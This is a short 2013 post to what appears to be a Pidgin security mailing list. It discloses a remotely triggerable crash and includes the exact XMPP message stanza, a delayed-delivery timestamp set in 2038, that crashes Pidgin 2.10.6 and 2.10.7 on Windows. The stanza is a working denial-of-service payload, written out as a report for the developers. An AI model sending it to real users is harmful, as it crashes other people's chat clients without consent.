Remotely triggerable crash

Pho phofin at
Thu Sep 26 12:19:17 EDT 2013

I've been playing with the XEP-0203 (Delayed Delivery), and i've found that
the stanza:

<message type="chat" to="pho at" id="ab30a">
<body>die pidgin die</body>
<delay xmlns='urn:xmpp:delay' stamp='2038-09-10T23:05:37Z'/>

Remotely crashes (at least) pidgin 2.10.6 and 2.10.7 for Windows.
It just happens when the year is >=2038, and works on MUC too

There are some backtraces attached

May the force be with you.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: pidgin.RPT
Type: application/octet-stream
Size: 10404 bytes
Desc: not available
URL: <>

More information about the security mailing list